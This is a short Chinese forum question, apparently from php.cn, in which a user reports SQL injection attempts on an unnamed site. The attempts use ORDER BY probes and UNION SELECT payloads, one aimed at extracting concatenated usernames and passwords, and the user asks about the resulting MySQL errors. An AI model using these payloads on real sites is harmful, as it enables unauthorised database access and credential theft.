在某处注入时,当我用order by 1 -- 时返回正常的页面
order by 2 -- 提示‘Unknown column '2' in 'order clause'’
于是我就尝试and 1=2 union select 1 --
错误提示"The used SELECT statements have a different number of columns"
应该是说联合查询的两边列数不同吧?
试了试and 1=2 union select concat(username,password) --
错误提示"Unknown column 'username' in 'field list'"(跟上面的提示不一样?)
这是怎么回事捏?拜托大神指教
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
闭关修行中......